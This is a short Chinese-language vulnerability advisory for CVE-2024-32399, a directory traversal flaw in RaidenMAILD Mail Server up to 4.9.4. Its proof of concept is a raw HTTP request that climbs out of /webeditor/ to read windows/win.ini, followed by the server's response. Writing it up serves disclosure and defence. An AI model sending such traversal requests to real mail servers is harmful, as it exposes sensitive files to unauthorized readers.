0x00 前言
RaidenMAILD是一款强大的电子邮件服务器,该软件可以在相当短的时间内将它架设起来邮件服务器,操作简单,功能齐全,稳定运作。
适用于全 Windows 平台的电子邮件伺服器。
0x01 漏洞描述
RaidenMAILD Mail Server 4.9.4及之前版本中的目录遍历漏洞使远程攻击者能够通过/webeditor/组件获取敏感信息。
0x02 CVE编号
CVE-2024-32399
0x03 影响版本
RaidenMAILD Mail Server <= 4.9.4
0x04 漏洞详情
POC:
https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md
代码语言:javascript复制GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: closeHTTP/1.1 200 OK
Connection: close
Content-Disposition: attachment; filename="../../../windows/win.ini";
Content-Type: application/octet-stream
Content-Length: 403
Date: Mon, 22 Apr 2024 15:00:41 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Permissions-Policy: geolocation=(self "https://example.com"), microphone=()
Referrer-Policy: no-referrer
Content-Security-Policy: base-uri 'self'
Set-Cookie: IDHTTPSESSIONID=9E5BgVAlG7P7C5X; Path=/
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...
...0x05 参考链接
http://www.raidenmaild.com/cn/
https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md
